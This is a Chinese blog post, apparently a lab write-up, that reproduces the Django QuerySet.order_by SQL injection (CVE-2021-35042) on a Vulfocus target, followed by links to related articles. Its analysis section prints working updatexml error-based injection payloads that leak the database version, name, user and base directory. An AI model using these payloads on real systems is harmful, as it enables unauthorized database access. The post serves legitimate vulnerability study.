【漏洞复现-Django-SQL注入】Django-SQL注入CVE-2021-35042

最新推荐文章于 2024-07-18 10:54:23 发布
最新推荐文章于 2024-07-18 10:54:23 发布
阅读量1k 收藏 4
点赞数 2
分类专栏: 0X06【漏洞复现】 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/127281638
版权

目录

一、靶场环境

1.1、平台:

1.2、知识:

1.3、描述:

二、漏洞验证

2.1、分析:

2.4、解题:

一、靶场环境

1.1、平台:

Vulfocus 漏洞威胁分析平台

123.58.224.8:30212

 

打开直接给了一个vuln接口(送分了属于是)

 

1.2、知识:

1、也就是分析参数带入前后有没有发生变化了

但很多时候仅仅通过页面,是无法分析出的

(使用bp抓包后,对数据包分析是否有差别)

2、掌握基本函数,注入方法

updatexml报错注入

`concat()`函数是将其连成一个字符串,因此不会符合`XPath_string`的格式,因此会造成格式错误

`0x7e` ASCII码(为`~`),updatexml报错为特殊字符、字母及之后的内容,为了防止前面的字母丢失,开头连接一个特殊字符

1.3、描述:

Django 3.2 ,3.1

允许 QuerySet.order_by SQL 注入。http://ip:port/vuln/?order=

二、漏洞验证

2.1、分析:

http://ip:port/vuln/?order=id

(从1到4升序排列)

 http://ip:port/vuln/?order=-id

 (从4到1降序排列)

返回的数据随值的改变而改变

 (带入到了数据库中被执行)

可以通过报错注入,来查看信息

http://ip:port/vuln/?order=vuln_collection.id);select updatexml(1, concat(0x7e,(select @@basedir)),1)%23

 /vuln/?order=vuln_collection.id);select updatexml(1, concat(0x7e,(select @@version)),1)%23

/vuln/?order=vuln_collection.id);select updatexml(1, concat(0x7e,(select database())),1)%23

 /vuln/?order=vuln_collection.id);select updatexml(1, concat(0x7e,(select user())),1)%23

 ……

(报数据库,表,字段,数据)

 

2.4、解题:

 

黑色地带(崛起)
关注
专栏目录
[ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042
qq_51577576的博客
09-28 2642
[ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。
[ vulhub漏洞复现篇 ] Django JSONField/HStoreField SQL 注入漏洞 CVE-2019-14234
qq_51577576的博客
09-30 2521
[ vulhub漏洞复现篇 ] Django JSONField/HStoreField SQL 注入漏洞 CVE-2019-14234 Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。
Django sql注入漏洞
weixin_67832238的博客
05-13 477
1、访问Django: the Web framework for perfectionists with deadlines.,可以看到Django的默认页面 访问Django: the Web framework for perfectionists with deadlines./authentucate查找存在用户 存在用户admin 2、查找密码 利用Burpsuite爆破 可以得到密码为a123123123 3、添加用户信息 添...
Django SQL注入 (CVE-2021-35042)
最新发布
qq_23003811的博客
07-18 253
order_by 是来自 Web 应用程序客户端的不受信任的输入,而 3.1.13 之前的 Django 3.1.x 和 3.2.5 之前的 3.2.x 允许 QuerySet.order_by SQL 注入。3、访问/vuln/?order=页面报错,有回显,而且flag就在这里。2、访问vuln/,返回一个数据列表,有列表首先想到的就是排序。1、输入任意不存在目录,提示存在vuln/接口。Django 3.2.5 之前的 3.2.x。
Django SQL注入CVE-2022-28346)
weixin_46801402的博客
11-01 1122
Django SQL注入CVE-2022-28346)
django-sql注入攻击
随风逆流的蒲公英的博客
06-18 441
什么是sql注入注入本质上就是把输入的数据变成可执行的程序语句,所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。攻击者通过在应用程序预先定义好的SQL语句结尾加上额外的SQL语句元素,欺骗数据库服务器执行非授权的查询,篡改命令。它能够轻易的绕过防火墙直接访问数据库,甚至能够获得数据库所在的服务器的系统权限。在Web应用漏洞中,SQL Injection 漏洞的风险要高过其他所有的漏洞
Python 开发 框架安全Django SQL注入漏洞测试.(CVE-2021-35042
网络安全领域___专研者.
05-08 1207
Django 是一个用 Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来,使得开发人员可以更加专注于应用程序的不同方面。
漏洞复现Django SQL注入漏洞 (CVE-2022-28346)
做自己喜欢的事,并将其发挥到极致!
01-01 4759
Django是用Python开发的一个免费开源的Web结构,几乎包括了Web使用方方面面,能够用于快速建立高性能、文雅的网站,Diango提供了许多网站后台开发常常用到的模块,使开发者可以专注于业务部分。攻击者使用精心编制的字典,通过 **kwargs 传递给QuerySet.annotate()、aggregate()和extra()这些方法,可导致这些方法在列别名中受到SQL注入攻击,该漏洞在2.2.28之前的Django 2.2、3.2.13之前的3.2和4.0.4之前的4.0中都存在这个问题。
CVE-2019-14234 Django JSONField SQL注入漏洞
weixin_45260839的博客
06-25 1726
CVE-2019-14234 Django JSONField SQL注入漏洞
python+Django实现防止SQL注入的办法
09-18
主要介绍了python+Django实现防止SQL注入的办法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Django SQL注入漏洞
RhxrhxrR的博客
05-13 335
1.访问http://110.40.154.100:8000,可以看到Django的默认页面 2.访问http://110.40.154.100:8000/admin进入登录界面 输入账号密码进行登录 3.进入Collection的管理页面http://110.40.154.100:8000/admin/vuln/collection/ 4.GET参数中构造detail__a'b=123提交,其中detail是模型Collection中的JSONFie...
Vulhub-django GIS SQL注入漏洞
shayebudon的博客
12-14 1069
首先转到列表视图:http://your-ip:8000/vuln/ 添加?order=-id到 GET 参数。看到按 id 降序排列的数据。 看到按 id 降序排列的数据。 因此根据这个信息我们可以构造报错注入来进行攻击获取数据信息。 ?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23,其中vuln是我们的应用程序和collection模型。 .
漏洞复现-django-SQL注入】vulfocus/django-cve_2022_28346
10-12 1742
django-SQL注入】可控参数注入
Django注入
S1942177831的博客
05-13 253
1.登录网址:Log in | Django site admin 2.创建用户信息 3.输入信息 5.创建成功
sqlmap检测SQL注入及解决方案(Django)--超详细
pygodnet的博客
01-07 1083
一:场景、演示 场景:查询等拼接SQL和参数的问题,博主为了检测,这里写一个有注入风险的接口,请勿模仿 class PostMan(View): def get(self, request): aa = request.GET.get('aa') with connections['default'].cursor() as cursor: sql = 'select * from sys_dict where pid = %s'%(aa)
Django sql注入及解决方案
pygodnet的博客
11-24 2466
Django sql注入及解决方案 前言:sql注入多产生在拼接sql语句的场景,对数据库进行越权访问或其他危险操作,危害极其严重,本文介绍在djangosql注入的预防措施。 示例: 简单的查询语句: my_connection = connections['default'] with my_connection.cursor() as cursor: sql = "select * from my_table where id=%s limit 10"%(pk) cursor.exe
Python Web 框架 Django 修复SQL注入漏洞CVE-2022-34265)
murphysec的博客
07-09 2023
Django 是一个由 Python 语言编写的开源 Web 应用框架,Github 上 star 为 64.9K。Python 开发者使用 Django 可以快速开发、设计和部署网站。7月4日,OSCS 监测到 Django 官方修复了一个 SQL 注入漏洞。如果 Trunc() 方法的 kind 参数和 Extract() 方法的 lookup_name 参数没有进行安全过滤,可能会造成 SQL 注入的风险,建议各位开发者关注。更多漏洞详细信息可进入 OSCS 社区查看:https://www.oscs
Django 2020-9402 Geo SQL注入漏洞详解与修复分析
Django CVE-2020-9402是一个针对Oracle数据库的SQL注入漏洞,主要影响的是GIS(Geographic Information System)功能中的函数和聚合操作。这个漏洞源于对GIS查询中的`tolerance`参数的不当处理,该参数允许用户输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值